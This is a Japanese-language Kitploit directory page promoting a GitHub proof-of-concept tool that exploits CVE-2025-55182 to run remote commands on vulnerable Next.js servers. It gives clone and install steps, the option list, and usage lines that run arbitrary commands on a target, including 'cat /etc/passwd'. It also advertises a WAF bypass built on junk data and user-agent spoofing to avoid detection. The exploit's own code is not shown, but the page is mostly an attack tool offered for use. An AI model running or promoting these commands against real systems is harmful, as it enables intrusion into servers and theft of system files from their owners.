Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-poc-tool | Kitploit
ツール/GitHubGitHub/dh4v4l8/cve-2025-55182-poc-tool
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用WAFバイパスペネトレーションテストリモートアクセスツール
GitHubdh4v4l8/cve-2025-55182-poc-tool

CVE-2025-55182-poc-tool

リポジトリを見る
318ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182-poc-tool

Next.js React Server ComponentsのCVE-2025-55182脆弱性を検出・悪用するための強力なエクスプロイトツールです。このツールは、組み込みのWAFバイパス機能により、脆弱なNext.jsアプリケーションに対するリモートコマンド実行(RCE)を可能にします。

ロゴ

概要

CVE-2025-55182は、Next.js React Server Componentsにおける深刻な脆弱性で、リモートの攻撃者が脆弱なサーバー上で任意のコマンドを実行できるようにします。このツールは、この脆弱性を検出および悪用するための自動化された方法を提供します。

機能

  • リモートコマンド実行: 脆弱なNext.jsサーバー上で任意のコマンドを実行
  • WAFバイパス: 設定可能なジャンクデータによる組み込みのWebアプリケーションファイアウォールバイパス
  • カスタムヘッダーサポート: 認証やその他の目的のためにカスタムHTTPヘッダーを追加
  • 柔軟なターゲット指定: 単一ターゲットとバッチスキャンをサポート
  • 複数プロトコルサポート: HTTPS/HTTPの自動検出と処理
  • カスタムタイムアウト: さまざまなネットワーク環境に対応する設定可能なリクエストタイムアウト
  • SSL検証の制御: SSL証明書の検証を無効にするオプション
  • カスタムユーザーエージェント: 検出を回避するためにユーザーエージェントを偽装

クイックインストール

root@kitploit:~
# Clone the repository
git clone https://github.com/Dh4v4l8/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool

# Make the script executable
chmod +x exploit.sh

# Test the installation
./exploit.sh -h

使用方法

このツールは、研究者がリクエストをカスタマイズしたり、トラフィックをシミュレートしたり、フィルタリングレイヤーをテストしたりできる、いくつかのコマンドラインオプションを提供します。

root@kitploit:~
Usage: ./exploit.sh [OPTIONS]

Options:
  -d, --domain          Target domain/URL (default: http://localhost:3000)
                        If no protocol specified, defaults to https://
  -c, --command         Command to execute (default: id)
  -w, --waf-bypass      Enable WAF bypass with junk data (default: 128KB)
  --waf-size SIZE       WAF bypass data size in KB (default: 128)
  --timeout SECONDS     Request timeout in seconds (default: 15)
  -k, --insecure        Disable SSL certificate verification
  --user-agent AGENT    Custom User-Agent string
  -h, --help            Show this help message

基本的な使用方法

root@kitploit:~
# Check if target is vulnerable with default command
./exploit.sh -d https://target.com

# Execute custom command
./exploit.sh -d https://target.com -c "whoami"

# Read system files
./exploit.sh -d https://target.com -c "cat /etc/passwd"

高度な使用方法

root@kitploit:~
# Enable WAF bypass
./exploit.sh -d https://target.com -c "ls -la" -w

# Custom WAF bypass size (256KB)
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

# Disable SSL verification
./exploit.sh -d https://target.com -c "id" -k

# Custom timeout
./exploit.sh -d https://target.com -c "ping -c 3 google.com" --timeout 30

# Custom User-Agent
./exploit.sh -d https://target.com -c "id" --user-agent "CustomScanner/1.0"

クレジット

  • このツールはセキュリティコミュニティによる研究に基づいています。特に感謝します:

infosec_au

zack0x01

ツールをダウンロード